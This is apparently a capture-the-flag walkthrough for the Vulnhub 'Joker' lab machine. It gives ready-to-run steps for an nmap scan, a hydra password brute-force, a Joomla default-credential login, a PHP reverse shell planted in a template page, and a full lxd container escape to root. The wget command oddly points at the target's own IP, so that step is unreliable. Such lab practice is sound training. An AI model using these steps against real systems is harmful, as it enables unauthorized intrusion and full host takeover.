Vulnhub Joker Walkthrough

Start by scanning the host with nmap: nmap -A -T4 -p- 192.168.1.13 -vv

Scan it again, this time with dirb.

I downloaded all the pictures from the /img path and found that picture 100.jpg has some information encrypted in it, but it needs a password: steghide extract -sf 100.jpg

So I tried something else for now and went to brute force port 8080 with hydra, using the username joker and the rockyou.txt file as the password list.

The site is running Joomla, with the login page located at http://192.168.1.13:8080/administrator/ and joomla:joomla as the login (google it).

Then I tried to upload a PHP shell into the media section, but it didn't work; even uploading a picture didn't work.

So I kept poking around till I found in the settings that PHP is enabled in the templates section. So let's modify a page with our PHP shell and save it. It's better to modify the error page so you don't mess up the site (been there before).

Then navigate to 192.168.1.13:8080/templates/beez3/error.php while you have nc listening on a port on your machine.

Run id and you can see the host is vulnerable through lxd, so now we need to escalate privileges using the lxd exploit. Do as I say, step by step, to get this done:

First of all, download this repository from GitHub to your machine and build it: https://github.com/saghul/lxd-alpine-builder

cd to the folder and run ./build-alpine

You will then get a tar file. Copy it to the host using wget http://192.168.1.13/alpine-v3.11-x86_64-20200130_1501.tar.gz and, of course, run python -m SimpleHTTPServer 80 on your machine to serve it.

Now run these commands in order:

lxc image import ./alpine-v3.11-x86_64-20200130_1501.tar.gz --alias hacker

lxc image list

lxc init hacker mycontainer -c security.privileged=true

lxc config device add mycontainer mydevice disk source=/ path=/mnt/root recursive=true

lxc list

lxc start mycontainer

lxc exec mycontainer /bin/sh

Then navigate to /mnt/root/root and cat final.txt
